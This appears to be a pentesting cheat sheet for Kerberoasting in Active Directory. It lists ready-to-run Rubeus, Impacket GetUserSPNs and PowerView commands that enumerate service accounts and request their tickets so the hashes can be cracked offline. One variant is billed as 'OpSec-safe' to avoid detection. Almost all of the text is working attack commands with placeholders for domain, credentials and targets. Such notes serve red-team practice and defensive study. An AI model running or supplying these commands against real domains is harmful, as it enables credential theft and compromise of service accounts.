# Kerberoasting

### Kerberoasting with Rubeus

```bash
# Generic Kerberoasting with Rubeus 
.\Rubeus.exe kerberoast /nowrap

# Generic Kerberoasting and saving the output to a file
.\Rubeus.exe kerberoast /nowrap /outfile:C:\Windows\Tasks\kerberoast.txt

# Perform targeted Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:$serviceaccount

# OpSec-safe Kerberoasting with the 'tgtdeleg' trick, filtering out AES-enabled accounts
.\Rubeus.exe kerberoast /rc4opsec
```

### Kerberoasting with Impacket

```bash
# List accounts with SPNs
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip

# Generic Kerberoasting with Impacket
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip -request

# Targeted Kerberoast
GetUserSPNs.py $domain/$username:$password -dc-ip $dcip /user:$serviceaccount -request
```

### Kerberoasting with PowerView

```bash
# Generic Kerberoast with PowerView
Invoke-Kerberoast | fl

# Specify Domain in Kerberoast
Invoke-Kerberoast -Domain $domain | fl
```

### References

{% embed url="<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting>" %}

{% embed url="<https://m365internals.com/2021/11/08/kerberoast-with-opsec/>" %}